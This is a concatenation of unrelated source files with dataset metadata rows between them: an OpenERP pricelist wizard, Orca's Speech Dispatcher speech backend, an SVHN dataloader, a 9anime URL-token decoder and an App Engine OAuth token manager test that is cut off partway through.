def do_insert_quotation(self, cr, uid, ids, context=None):
""" Create or update pricelist if non custom and add personalization
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of ids
@return: Dictionary {}
"""
if context is None:
context={}
wiz_browse = self.browse(cr, uid, ids[0], context=context)
customer_proxy = self.pool.get('res.partner').browse(
cr, uid, wiz_browse.partner_id.id)
pricelist_org_id = wiz_browse.pricelist_id.id # old pricelist set up
pricelist_proxy = self.pool.get('product.pricelist').browse(
cr, uid, pricelist_org_id)
if not pricelist_proxy.customized: # Create customized and first rule
update = False
pricelist_ref_id = self.pool.get('product.pricelist').create(
cr, uid, {
'name': "Personal: " + customer_proxy.name,
'type': 'sale',
'customized': True,
})
if pricelist_ref_id:
version_ref_id = self.pool.get(
'product.pricelist.version').create(
cr, uid, {
'name': "From " + \
customer_proxy.property_product_pricelist.name,
#'date_end': False,
#'date_start': False,
#'company_id': False,
#'active': True,
                        'pricelist_id': pricelist_ref_id,  # just created
})
else:
                pass  # TODO communicate error
else: # yet custom pricelist
update = True
pricelist_ref_id = customer_proxy.property_product_pricelist.id
# TODO take the first for now!
version_ref_id = \
customer_proxy.property_product_pricelist.version_id[0].id
if not (pricelist_ref_id and version_ref_id):
            # TODO communicate error!
return {'type': 'ir.actions.act_window_close'}
pricelist_item_pool = self.pool.get('product.pricelist.item')
        # Last rule: fall back to the previous pricelist as the reference
if not update: # Create ref. pricelist only for first new!
rule_id = pricelist_item_pool.create(cr, uid, {
'price_round': 0.00001,
'price_discount': 0.0, #0.052600000000000001,
                'sequence': 500,  # last
'price_max_margin': 0.0,
'base': 2, # pricelist version
'price_version_id': version_ref_id, #owner version
'min_quantity': 1,
'price_surcharge': 0.0,
'base_pricelist_id': pricelist_ref_id,
'name': "Listino rif: " + \
customer_proxy.property_product_pricelist.name,
})
        # Create the rule based on the current product and price
        # TODO check whether a rule for this product already exists!
rule_id = pricelist_item_pool.create(cr, uid, {
'price_round': 0.00001,
'price_discount': 0.0, #0.052600000000000001,
            'sequence': 10,  # among the first
'price_max_margin': 0.0,
'product_id': wiz_browse.product_id.id,
'base': 1,
'price_version_id': version_ref_id,
'min_quantity': 1,
'price_surcharge': wiz_browse.price,
'name': "[%s] %s" % (
wiz_browse.product_id.code,
wiz_browse.product_id.name),
})
# Set up partner with new pricelist
self.pool.get('res.partner').write(cr, uid, [wiz_browse.partner_id.id],
{'property_product_pricelist': pricelist_ref_id})
return {'type': 'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
| -7,251,331,763,021,639,000
| 40.988506
| 79
| 0.528552
| false
| 4.181548
| false
| false
| false
|
GNOME/orca
|
src/orca/speechdispatcherfactory.py
|
1
|
27427
|
# Copyright 2006, 2007, 2008, 2009 Brailcom, o.p.s.
#
# Author: Tomas Cerha <cerha@brailcom.org>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
#
# [[[TODO: richb - Pylint is giving us a bunch of warnings along these
# lines throughout this file:
#
# W0142:202:SpeechServer._send_command: Used * or ** magic
#
# So for now, we just disable these warnings in this module.]]]
#
# pylint: disable-msg=W0142
"""Provides an Orca speech server for Speech Dispatcher backend."""
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__author__ = "Tomas Cerha <cerha@brailcom.org>"
__copyright__ = "Copyright (c) 2006-2008 Brailcom, o.p.s."
__license__ = "LGPL"
from gi.repository import GLib
import re
import time
from . import chnames
from . import debug
from . import guilabels
from . import messages
from . import speechserver
from . import settings
from . import orca_state
from . import punctuation_settings
from . import settings_manager
from .acss import ACSS
_settingsManager = settings_manager.getManager()
try:
import speechd
except:
_speechd_available = False
else:
_speechd_available = True
try:
getattr(speechd, "CallbackType")
except AttributeError:
_speechd_version_ok = False
else:
_speechd_version_ok = True
PUNCTUATION = re.compile(r'[^\w\s]', re.UNICODE)
ELLIPSIS = re.compile('(\342\200\246|(?<!\\.)\\.{3,4}(?=(\\s|\\Z)))')
class SpeechServer(speechserver.SpeechServer):
# See the parent class for documentation.
_active_servers = {}
DEFAULT_SERVER_ID = 'default'
_SERVER_NAMES = {DEFAULT_SERVER_ID: guilabels.DEFAULT_SYNTHESIZER}
@staticmethod
def getFactoryName():
return guilabels.SPEECH_DISPATCHER
@staticmethod
def getSpeechServers():
servers = []
default = SpeechServer._getSpeechServer(SpeechServer.DEFAULT_SERVER_ID)
if default is not None:
servers.append(default)
for module in default.list_output_modules():
servers.append(SpeechServer._getSpeechServer(module))
return servers
@classmethod
def _getSpeechServer(cls, serverId):
"""Return an active server for given id.
Attempt to create the server if it doesn't exist yet. Returns None
when it is not possible to create the server.
"""
if serverId not in cls._active_servers:
cls(serverId)
# Don't return the instance, unless it is successfully added
# to `_active_Servers'.
return cls._active_servers.get(serverId)
@staticmethod
def getSpeechServer(info=None):
thisId = info[1] if info is not None else SpeechServer.DEFAULT_SERVER_ID
return SpeechServer._getSpeechServer(thisId)
@staticmethod
def shutdownActiveServers():
servers = [s for s in SpeechServer._active_servers.values()]
for server in servers:
server.shutdown()
# *** Instance methods ***
def __init__(self, serverId):
super(SpeechServer, self).__init__()
self._id = serverId
self._client = None
self._current_voice_properties = {}
self._acss_manipulators = (
(ACSS.RATE, self._set_rate),
(ACSS.AVERAGE_PITCH, self._set_pitch),
(ACSS.GAIN, self._set_volume),
(ACSS.FAMILY, self._set_family),
)
if not _speechd_available:
msg = 'ERROR: Speech Dispatcher is not available'
debug.println(debug.LEVEL_WARNING, msg, True)
return
if not _speechd_version_ok:
msg = 'ERROR: Speech Dispatcher version 0.6.2 or later is required.'
debug.println(debug.LEVEL_WARNING, msg, True)
return
# The following constants must be initialized in runtime since they
# depend on the speechd module being available.
try:
most = speechd.PunctuationMode.MOST
except:
most = speechd.PunctuationMode.SOME
self._PUNCTUATION_MODE_MAP = {
settings.PUNCTUATION_STYLE_ALL: speechd.PunctuationMode.ALL,
settings.PUNCTUATION_STYLE_MOST: most,
settings.PUNCTUATION_STYLE_SOME: speechd.PunctuationMode.SOME,
settings.PUNCTUATION_STYLE_NONE: speechd.PunctuationMode.NONE,
}
self._CALLBACK_TYPE_MAP = {
speechd.CallbackType.BEGIN: speechserver.SayAllContext.PROGRESS,
speechd.CallbackType.CANCEL: speechserver.SayAllContext.INTERRUPTED,
speechd.CallbackType.END: speechserver.SayAllContext.COMPLETED,
speechd.CallbackType.INDEX_MARK:speechserver.SayAllContext.PROGRESS,
}
self._default_voice_name = guilabels.SPEECH_DEFAULT_VOICE % serverId
try:
self._init()
except:
debug.printException(debug.LEVEL_WARNING)
msg = 'ERROR: Speech Dispatcher service failed to connect'
debug.println(debug.LEVEL_WARNING, msg, True)
else:
SpeechServer._active_servers[serverId] = self
self._lastKeyEchoTime = None
def _init(self):
self._client = client = speechd.SSIPClient('Orca', component=self._id)
client.set_priority(speechd.Priority.MESSAGE)
if self._id != self.DEFAULT_SERVER_ID:
client.set_output_module(self._id)
self._current_voice_properties = {}
mode = self._PUNCTUATION_MODE_MAP[settings.verbalizePunctuationStyle]
client.set_punctuation(mode)
client.set_data_mode(speechd.DataMode.SSML)
def updateCapitalizationStyle(self):
"""Updates the capitalization style used by the speech server."""
if settings.capitalizationStyle == settings.CAPITALIZATION_STYLE_ICON:
style = 'icon'
elif settings.capitalizationStyle == settings.CAPITALIZATION_STYLE_SPELL:
style = 'spell'
else:
style = 'none'
try:
self._client.set_cap_let_recogn(style)
except speechd.SSIPCommunicationError:
msg = "SPEECH DISPATCHER: Connection lost. Trying to reconnect."
debug.println(debug.LEVEL_INFO, msg, True)
self.reset()
self._client.set_cap_let_recogn(style)
except:
pass
def updatePunctuationLevel(self):
""" Punctuation level changed, inform this speechServer. """
mode = self._PUNCTUATION_MODE_MAP[settings.verbalizePunctuationStyle]
self._client.set_punctuation(mode)
def _send_command(self, command, *args, **kwargs):
try:
return command(*args, **kwargs)
except speechd.SSIPCommunicationError:
msg = "SPEECH DISPATCHER: Connection lost. Trying to reconnect."
debug.println(debug.LEVEL_INFO, msg, True)
self.reset()
return command(*args, **kwargs)
except:
pass
def _set_rate(self, acss_rate):
rate = int(2 * max(0, min(99, acss_rate)) - 98)
self._send_command(self._client.set_rate, rate)
def _set_pitch(self, acss_pitch):
pitch = int(20 * max(0, min(9, acss_pitch)) - 90)
self._send_command(self._client.set_pitch, pitch)
def _set_volume(self, acss_volume):
volume = int(15 * max(0, min(9, acss_volume)) - 35)
self._send_command(self._client.set_volume, volume)
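    # Worked mapping of the three formulas above (values chosen for
    # illustration): an ACSS rate of 50 gives int(2*50 - 98) = 2, an ACSS pitch
    # of 5.0 gives int(20*5 - 90) = 10, and an ACSS volume of 9 gives
    # int(15*9 - 35) = 100, i.e. the defaults land near the middle of Speech
    # Dispatcher's -100..100 scales, with volume near the top.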
def _get_language_and_dialect(self, acss_family):
if acss_family is None:
acss_family = {}
language = acss_family.get(speechserver.VoiceFamily.LANG)
dialect = acss_family.get(speechserver.VoiceFamily.DIALECT)
if not language:
import locale
familyLocale, encoding = locale.getdefaultlocale()
language, dialect = '', ''
if familyLocale:
localeValues = familyLocale.split('_')
language = localeValues[0]
if len(localeValues) == 2:
dialect = localeValues[1]
return language, dialect
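    # Example (assumed environment, for illustration only): with no language in
    # the ACSS family and locale.getdefaultlocale() returning ('cs_CZ', 'UTF-8'),
    # this returns ('cs', 'CZ'); a locale string without an underscore, such as
    # 'C', would yield ('C', '').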
def _set_family(self, acss_family):
lang, dialect = self._get_language_and_dialect(acss_family)
if lang:
self._send_command(self._client.set_language, lang)
if dialect:
# Try to set precise dialect
self._send_command(self._client.set_language, lang + '-' + dialect)
try:
# This command is not available with older SD versions.
set_synthesis_voice = self._client.set_synthesis_voice
except AttributeError:
pass
else:
name = acss_family.get(speechserver.VoiceFamily.NAME)
self._send_command(set_synthesis_voice, name)
def _debug_sd_values(self, prefix=""):
if debug.debugLevel > debug.LEVEL_INFO:
return
try:
sd_rate = self._send_command(self._client.get_rate)
sd_pitch = self._send_command(self._client.get_pitch)
sd_volume = self._send_command(self._client.get_volume)
sd_language = self._send_command(self._client.get_language)
except:
sd_rate = sd_pitch = sd_volume = sd_language = "(exception occurred)"
family = self._current_voice_properties.get(ACSS.FAMILY)
styles = {settings.PUNCTUATION_STYLE_NONE: "NONE",
settings.PUNCTUATION_STYLE_SOME: "SOME",
settings.PUNCTUATION_STYLE_MOST: "MOST",
settings.PUNCTUATION_STYLE_ALL: "ALL"}
current = self._current_voice_properties
msg = "SPEECH DISPATCHER: %s\n" \
"ORCA rate %s, pitch %s, volume %s, language %s, punctuation: %s \n" \
"SD rate %s, pitch %s, volume %s, language %s" % \
(prefix,
self._current_voice_properties.get(ACSS.RATE),
self._current_voice_properties.get(ACSS.AVERAGE_PITCH),
self._current_voice_properties.get(ACSS.GAIN),
self._get_language_and_dialect(family)[0],
styles.get(_settingsManager.getSetting("verbalizePunctuationStyle")),
sd_rate,
sd_pitch,
sd_volume,
sd_language)
debug.println(debug.LEVEL_INFO, msg, True)
def _apply_acss(self, acss):
if acss is None:
acss = settings.voices[settings.DEFAULT_VOICE]
current = self._current_voice_properties
for acss_property, method in self._acss_manipulators:
value = acss.get(acss_property)
if value is not None:
if current.get(acss_property) != value:
method(value)
current[acss_property] = value
elif acss_property == ACSS.AVERAGE_PITCH:
method(5.0)
current[acss_property] = 5.0
elif acss_property == ACSS.GAIN:
method(10)
current[acss_property] = 5.0
elif acss_property == ACSS.RATE:
method(50)
current[acss_property] = 5.0
elif acss_property == ACSS.FAMILY:
method({})
current[acss_property] = {}
def __addVerbalizedPunctuation(self, oldText):
"""Depending upon the users verbalized punctuation setting,
adjust punctuation symbols in the given text to their pronounced
equivalents. The pronounced text will either replace the
punctuation symbol or be inserted before it. In the latter case,
        this is to retain spoken prosody.
Arguments:
- oldText: text to be parsed for punctuation.
Returns a text string with the punctuation symbols adjusted accordingly.
"""
style = _settingsManager.getSetting("verbalizePunctuationStyle")
if style == settings.PUNCTUATION_STYLE_NONE:
return oldText
spokenEllipsis = messages.SPOKEN_ELLIPSIS + " "
newText = re.sub(ELLIPSIS, spokenEllipsis, oldText)
symbols = set(re.findall(PUNCTUATION, newText))
for symbol in symbols:
try:
level, action = punctuation_settings.getPunctuationInfo(symbol)
except:
continue
if level != punctuation_settings.LEVEL_NONE:
# Speech Dispatcher should handle it.
#
continue
charName = " %s " % chnames.getCharacterName(symbol)
if action == punctuation_settings.PUNCTUATION_INSERT:
charName += symbol
newText = re.sub(symbol, charName, newText)
if orca_state.activeScript:
newText = orca_state.activeScript.utilities.adjustForDigits(newText)
return newText
def _speak(self, text, acss, **kwargs):
if isinstance(text, ACSS):
text = ''
# Mark beginning of words with U+E000 (private use) and record the
# string offsets
# Note: we need to do this before disturbing the text offsets
        # Note2: we assume that text mangling below leaves U+E000 untouched
last_begin = None
last_end = None
is_numeric = None
marks_offsets = []
marks_endoffsets = []
marked_text = ""
for i in range(len(text)):
c = text[i]
if c == '\ue000':
# Original text already contains U+E000. But syntheses will not
# know what to do of it anyway, so discard it
continue
if not c.isspace() and last_begin == None:
# Word begin
marked_text += '\ue000'
last_begin = i
is_numeric = c.isnumeric()
elif c.isspace() and last_begin != None:
# Word end
if is_numeric:
                    # We had a wholly numeric word; possibly the next word is as well.
# Skip to next word
for j in range(i+1, len(text)):
if not text[j].isspace():
break
else:
is_numeric = False
# Check next word
while is_numeric and j < len(text) and not text[j].isspace():
if not text[j].isnumeric():
is_numeric = False
j += 1
if not is_numeric:
# add a mark
marks_offsets.append(last_begin)
marks_endoffsets.append(i)
last_begin = None
is_numeric = None
elif is_numeric and not c.isnumeric():
is_numeric = False
marked_text += c
if last_begin != None:
# Finished with a word
marks_offsets.append(last_begin)
marks_endoffsets.append(i + 1)
text = marked_text
text = self.__addVerbalizedPunctuation(text)
if orca_state.activeScript:
text = orca_state.activeScript.\
utilities.adjustForPronunciation(text)
# Replace no break space characters with plain spaces since some
# synthesizers cannot handle them. See bug #591734.
#
text = text.replace('\u00a0', ' ')
# Replace newline followed by full stop, since
# this seems to crash sd, see bgo#618334.
#
text = text.replace('\n.', '\n')
# Transcribe to SSML, translating U+E000 into marks
# Note: we need to do this after all mangling otherwise the ssml markup
# would get mangled too
ssml = "<speak>"
i = 0
for c in text:
if c == '\ue000':
if i >= len(marks_offsets):
# This is really not supposed to happen
msg = "%uth U+E000 does not have corresponding index" % i
debug.println(debug.LEVEL_WARNING, msg, True)
else:
ssml += '<mark name="%u:%u"/>' % (marks_offsets[i], marks_endoffsets[i])
i += 1
# Disable for now, until speech dispatcher properly parses them (version 0.8.9 or later)
#elif c == '"':
# ssml += '"'
#elif c == "'":
# ssml += '''
elif c == '<':
ssml += '<'
elif c == '>':
ssml += '>'
elif c == '&':
ssml += '&'
else:
ssml += c
ssml += "</speak>"
self._apply_acss(acss)
self._debug_sd_values("Speaking '%s' " % ssml)
self._send_command(self._client.speak, ssml, **kwargs)
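    # End-to-end illustration (assuming no pronunciation or punctuation
    # substitutions apply to the input): speaking "Hello world" is marked up as
    #     <speak><mark name="0:5"/>Hello <mark name="6:11"/>world</speak>
    # so the index-mark callbacks can report character offsets back to Orca.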
def _say_all(self, iterator, orca_callback):
"""Process another sayAll chunk.
Called by the gidle thread.
"""
try:
context, acss = next(iterator)
except StopIteration:
pass
else:
def callback(callbackType, index_mark=None):
# This callback is called in Speech Dispatcher listener thread.
# No subsequent Speech Dispatcher interaction is allowed here,
# so we pass the calls to the gidle thread.
t = self._CALLBACK_TYPE_MAP[callbackType]
if t == speechserver.SayAllContext.PROGRESS:
if index_mark:
index = index_mark.split(':')
if len(index) >= 2:
start, end = index[0:2]
context.currentOffset = context.startOffset + int(start)
context.currentEndOffset = context.startOffset + int(end)
msg = "SPEECH DISPATCHER: Got mark %d:%d / %d-%d" % \
(context.currentOffset, context.currentEndOffset, \
context.startOffset, context.endOffset)
debug.println(debug.LEVEL_INFO, msg, True)
else:
context.currentOffset = context.startOffset
context.currentEndOffset = None
elif t == speechserver.SayAllContext.COMPLETED:
context.currentOffset = context.endOffset
context.currentEndOffset = None
GLib.idle_add(orca_callback, context, t)
if t == speechserver.SayAllContext.COMPLETED:
GLib.idle_add(self._say_all, iterator, orca_callback)
self._speak(context.utterance, acss, callback=callback,
event_types=list(self._CALLBACK_TYPE_MAP.keys()))
return False # to indicate, that we don't want to be called again.
def _cancel(self):
self._send_command(self._client.cancel)
def _change_default_speech_rate(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
rate = acss[ACSS.RATE]
except KeyError:
rate = 50
acss[ACSS.RATE] = max(0, min(99, rate + delta))
msg = 'SPEECH DISPATCHER: Rate set to %d' % rate
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_SLOWER \
or messages.SPEECH_FASTER, acss=acss)
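    # Example (default values assumed): starting from the default ACSS rate of
    # 50, increaseSpeechRate() passes step=5, so the new rate is
    # max(0, min(99, 50 + 5)) = 55; a decrease from the same point gives 45.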
def _change_default_speech_pitch(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
pitch = acss[ACSS.AVERAGE_PITCH]
except KeyError:
pitch = 5
acss[ACSS.AVERAGE_PITCH] = max(0, min(9, pitch + delta))
msg = 'SPEECH DISPATCHER: Pitch set to %d' % pitch
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_LOWER \
or messages.SPEECH_HIGHER, acss=acss)
def _change_default_speech_volume(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
volume = acss[ACSS.GAIN]
except KeyError:
volume = 10
acss[ACSS.GAIN] = max(0, min(9, volume + delta))
msg = 'SPEECH DISPATCHER: Volume set to %d' % volume
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_SOFTER \
or messages.SPEECH_LOUDER, acss=acss)
def getInfo(self):
return [self._SERVER_NAMES.get(self._id, self._id), self._id]
def getVoiceFamilies(self):
# Always offer the configured default voice with a language
# set according to the current locale.
from locale import getlocale, LC_MESSAGES
locale = getlocale(LC_MESSAGES)[0]
if locale is None or locale == 'C':
locale_language = None
else:
locale_lang, locale_dialect = locale.split('_')
locale_language = locale_lang + '-' + locale_dialect
voices = ()
try:
# This command is not available with older SD versions.
list_synthesis_voices = self._client.list_synthesis_voices
except AttributeError:
pass
else:
try:
voices += self._send_command(list_synthesis_voices)
except:
pass
default_lang = ""
if locale_language:
            # Check how it appears in the server list
for name, lang, variant in voices:
if lang == locale_language:
default_lang = locale_language
break
if not default_lang:
for name, lang, variant in voices:
if lang == locale_lang:
default_lang = locale_lang
if not default_lang:
default_lang = locale_language
voices = ((self._default_voice_name, default_lang, None),) + voices
families = []
for name, lang, variant in voices:
families.append(speechserver.VoiceFamily({ \
speechserver.VoiceFamily.NAME: name,
#speechserver.VoiceFamily.GENDER: speechserver.VoiceFamily.MALE,
speechserver.VoiceFamily.LANG: lang.partition("-")[0],
speechserver.VoiceFamily.DIALECT: lang.partition("-")[2],
speechserver.VoiceFamily.VARIANT: variant}))
return families
def speak(self, text=None, acss=None, interrupt=True):
# In order to re-enable this, a potentially non-trivial amount of work
# will be needed to ensure multiple utterances sent to speech.speak
        # do not result in the initial utterances getting cut off before they
# can be heard by the user. Anyone needing to interrupt speech can
# do so via speech.stop -- or better yet, by using the default script
# method's presentationInterrupt.
#if interrupt:
# self._cancel()
# "We will not interrupt a key echo in progress." (Said the comment in
# speech.py where these next two lines used to live. But the code here
# suggests we haven't been doing anything with the lastKeyEchoTime in
# years. TODO - JD: Dig into this and if it's truly useless, kill it.)
if self._lastKeyEchoTime:
interrupt = interrupt and (time.time() - self._lastKeyEchoTime) > 0.5
if text:
self._speak(text, acss)
def speakUtterances(self, utteranceList, acss=None, interrupt=True):
# In order to re-enable this, a potentially non-trivial amount of work
# will be needed to ensure multiple utterances sent to speech.speak
        # do not result in the initial utterances getting cut off before they
# can be heard by the user. Anyone needing to interrupt speech can
# do so via speech.stop -- or better yet, by using the default script
# method's presentationInterrupt.
#if interrupt:
# self._cancel()
for utterance in utteranceList:
if utterance:
self._speak(utterance, acss)
def sayAll(self, utteranceIterator, progressCallback):
GLib.idle_add(self._say_all, utteranceIterator, progressCallback)
def speakCharacter(self, character, acss=None):
self._apply_acss(acss)
name = chnames.getCharacterName(character)
if not name or name == character:
self._send_command(self._client.char, character)
return
if orca_state.activeScript:
name = orca_state.activeScript.\
utilities.adjustForPronunciation(name)
self.speak(name, acss)
def speakKeyEvent(self, event, acss=None):
event_string = event.getKeyName()
if orca_state.activeScript:
event_string = orca_state.activeScript.\
utilities.adjustForPronunciation(event_string)
lockingStateString = event.getLockingStateString()
event_string = "%s %s" % (event_string, lockingStateString)
self.speak(event_string, acss=acss)
self._lastKeyEchoTime = time.time()
def increaseSpeechRate(self, step=5):
self._change_default_speech_rate(step)
def decreaseSpeechRate(self, step=5):
self._change_default_speech_rate(step, decrease=True)
def increaseSpeechPitch(self, step=0.5):
self._change_default_speech_pitch(step)
def decreaseSpeechPitch(self, step=0.5):
self._change_default_speech_pitch(step, decrease=True)
def increaseSpeechVolume(self, step=0.5):
self._change_default_speech_volume(step)
def decreaseSpeechVolume(self, step=0.5):
self._change_default_speech_volume(step, decrease=True)
def stop(self):
self._cancel()
def shutdown(self):
self._client.close()
del SpeechServer._active_servers[self._id]
def reset(self, text=None, acss=None):
self._client.close()
self._init()
def list_output_modules(self):
"""Return names of available output modules as a tuple of strings.
This method is not a part of Orca speech API, but is used internally
by the Speech Dispatcher backend.
The returned tuple can be empty if the information can not be
obtained (e.g. with an older Speech Dispatcher version).
"""
try:
return self._send_command(self._client.list_output_modules)
except AttributeError:
return ()
except speechd.SSIPCommandError:
return ()
|
lgpl-2.1
| -4,297,985,001,126,757,000
| 37.359441
| 100
| 0.584096
| false
| 4.025095
| false
| false
| false
|
googleinterns/out-of-distribution
|
src/datasets/load_svhn.py
|
1
|
2077
|
import multiprocessing
import os
from typing import Union
import torchvision
from torch.utils.data import DataLoader, ConcatDataset, Subset
from torchvision import transforms
from root import from_root
from src.misc.utils import read_lines
DATA_DIRPATH = from_root("data/svhn")
SPLIT_DIRPATH = from_root("splits/svhn")
SVHN_TRAIN_MEAN = [0.4310, 0.4303, 0.4464]
SVHN_TRAIN_STD = [0.1965, 0.1983, 0.1994]
def load_svhn_infer(split: str, batch_size: int, n_workers: Union[str, int]) -> DataLoader:
if split not in {"train", "val", "test"}:
raise ValueError("Split must be 'train', 'val', or 'test'!")
if batch_size <= 0:
raise ValueError("Batch_size must be positive!")
if type(n_workers) == str and n_workers != "n_cores":
raise ValueError("If n_workers is a string, it must be 'n_cores'!")
if type(n_workers) == int and n_workers < 0:
raise ValueError("If n_workers is an int, it must be non-negative!")
transform = transforms.ToTensor()
if split == "train":
dataset = ConcatDataset([
torchvision.datasets.SVHN(DATA_DIRPATH, split="train", transform=transform, download=True),
torchvision.datasets.SVHN(DATA_DIRPATH, split="extra", transform=transform, download=True)
])
indices = read_lines(os.path.join(SPLIT_DIRPATH, "train.txt"), int)
dataset = Subset(dataset, indices)
elif split == "val":
dataset = ConcatDataset([
torchvision.datasets.SVHN(DATA_DIRPATH, split="train", transform=transform, download=True),
torchvision.datasets.SVHN(DATA_DIRPATH, split="extra", transform=transform, download=True)
])
indices = read_lines(os.path.join(SPLIT_DIRPATH, "val.txt"), int)
dataset = Subset(dataset, indices)
else:
dataset = torchvision.datasets.SVHN(DATA_DIRPATH, split="test", transform=transform, download=True)
if n_workers == "n_cores":
n_workers = multiprocessing.cpu_count()
return DataLoader(dataset, batch_size=batch_size, shuffle=False, num_workers=n_workers)
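# Example usage (illustrative; the batch size is arbitrary):
#     loader = load_svhn_infer("test", batch_size=128, n_workers="n_cores")
#     images, labels = next(iter(loader))
# images is a float tensor of shape [128, 3, 32, 32] scaled to [0, 1] by
# ToTensor, and labels holds the SVHN digit classes for the batch.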
|
apache-2.0
| -1,984,148,229,769,911,600
| 41.387755
| 107
| 0.672123
| false
| 3.496633
| false
| false
| false
|
DxCx/plugin.video.9anime
|
resources/lib/ui/NineAnimeUrlExtender.py
|
1
|
3603
|
import re
from string import ascii_lowercase as lc, ascii_uppercase as uc, maketrans
class NineAnimeUrlExtender:
# _TS_MAP_TABLE = [i for i in uc if ord(i) % 2 != 0] + [i for i in uc if ord(i) % 2 == 0]
_CUSB64_MAP_TABLE = [i for i in lc if ord(i) % 2 != 0] + [i for i in lc if ord(i) % 2 == 0]
_ts_value_regex = re.compile(ur"<html.*data-ts\s*=[\"]([^\"]+?)[\"]")
_server_value_regex = \
re.compile(ur"\<div\sclass=\"widget-title\"\>\s(.+?)\s\<\/div\>")
_active_server_regex = \
re.compile(ur"\<span\sclass=\"tab active\"\sdata-name=\"(\d+)\".+?")
def __init__(self):
pass
@classmethod
def decode_info(cls, obj):
newObj = {}
for key, value in obj.iteritems():
if type(value) is unicode or type(value) is str:
                if value.startswith('.'):
                    newObj[key] = cls._rot_string(value[1:])
                elif value.startswith('-'):
                    newObj[key] = cls._cusb64_string(value[1:])
                else:
                    newObj[key] = value
elif type(value) is dict:
newObj[key] = cls.decode_info(value)
else:
newObj[key] = value
return newObj
@classmethod
def get_server_value(cls, content):
servers = cls._server_value_regex.findall(content)[0]
active_server = cls._active_server_regex.findall(servers)
if len(active_server) != 1:
raise Exception("Cant extract server id")
return int(active_server[0], 10)
@classmethod
def get_ts_value(cls, content):
ts_value = cls._ts_value_regex.findall(content)[0]
return ts_value
# return cls._decode_ts_value(ts_value)
@classmethod
def _rot_string(cls, content):
RotBy = 8
lookup = maketrans(lc + uc, lc[RotBy:] + lc[:RotBy] + uc[RotBy:] + uc[:RotBy])
decoded = str(content).translate(lookup)
return decoded
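    # Worked example of the rotation above: with RotBy = 8 every letter is
    # shifted forward by eight positions within its own case, so
    # _rot_string("abc") -> "ijk" and _rot_string("XYZ") -> "FGH"; digits and
    # punctuation pass through unchanged.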
# @classmethod
# def _decode_ts_value(cls, ts):
# decoded = ""
# for c in ts:
# replaced = False
# if c not in cls._TS_MAP_TABLE:
# decoded += c
# continue
# decoded += uc[cls._TS_MAP_TABLE.index(c)]
# missing_padding = len(decoded) % 4
# if missing_padding:
# decoded += b'=' * (4 - missing_padding)
# return decoded.decode("base64")
@classmethod
def _cusb64_string(cls, content):
decoded = ""
for c in content:
replaced = False
if c not in cls._CUSB64_MAP_TABLE:
decoded += c
continue
decoded += lc[cls._CUSB64_MAP_TABLE.index(c)]
missing_padding = len(decoded) % 4
if missing_padding:
decoded += b'=' * (4 - missing_padding)
return decoded.decode("base64")
@classmethod
def get_extra_url_parameter(cls, id, server, ts):
DD = 'bfcad671'
params = [
('id', str(id)),
('ts', str(ts)),
('server', str(server)),
]
o = cls._s(DD)
for i in params:
o += cls._s(cls._a(DD + i[0], i[1]))
return o
@classmethod
def _s(cls, t):
i = 0
for (e, c) in enumerate(t):
i += ord(c) + e
return i
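    # Worked example: _s("ab") sums ord('a') + 0 and ord('b') + 1, i.e.
    # 97 + 99 = 196, so the checksum depends on both the characters and their
    # positions.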
@classmethod
def _a(cls, t, e):
n = 0
for i in range(max(len(t), len(e))):
n *= ord(e[i]) if i < len(e) else 8
n *= ord(t[i]) if i < len(t) else 8
return format(n, 'x') # convert n to hex string
|
gpl-3.0
| -6,710,349,284,111,533,000
| 30.605263
| 95
| 0.502914
| false
| 3.441261
| false
| false
| false
|
martincochran/score-minion
|
oauth_token_manager_test.py
|
1
|
2779
|
#!/usr/bin/env python
#
# Copyright 2014 Martin Cochran
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import test_env_setup
from google.appengine.ext import testbed
import oauth_token_manager
class OauthTokenManagerTest(unittest.TestCase):
def setUp(self):
"""Stub out the datastore so we can test it."""
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_memcache_stub()
self.testbed.init_datastore_v3_stub()
def tearDown(self):
self.testbed.deactivate()
def testMockManager(self):
token_manager = oauth_token_manager.OauthTokenManager(is_mock=True)
self.assertEquals('', token_manager.GetSecret())
self.assertEquals('', token_manager.GetToken())
secret = 'my secret'
token = 'token for my secret'
token_manager.AddSecret(secret)
token_manager.AddToken(token)
self.assertEquals(secret, token_manager.GetSecret())
self.assertEquals(token, token_manager.GetToken())
secret = 'new secret'
token = 'token for new secret'
token_manager.AddSecret(secret)
token_manager.AddToken(token)
self.assertEquals(secret, token_manager.GetSecret())
self.assertEquals(token, token_manager.GetToken())
# Ensure we didn't actually touch the data store.
account_query = oauth_token_manager.ApiSecret.query(
ancestor=oauth_token_manager.api_secret_key()).order(
-oauth_token_manager.ApiSecret.date_added)
oauth_secrets = account_query.fetch(10)
self.assertEquals(0, len(oauth_secrets))
def testDatastoreBackedManager(self):
token_manager = oauth_token_manager.OauthTokenManager()
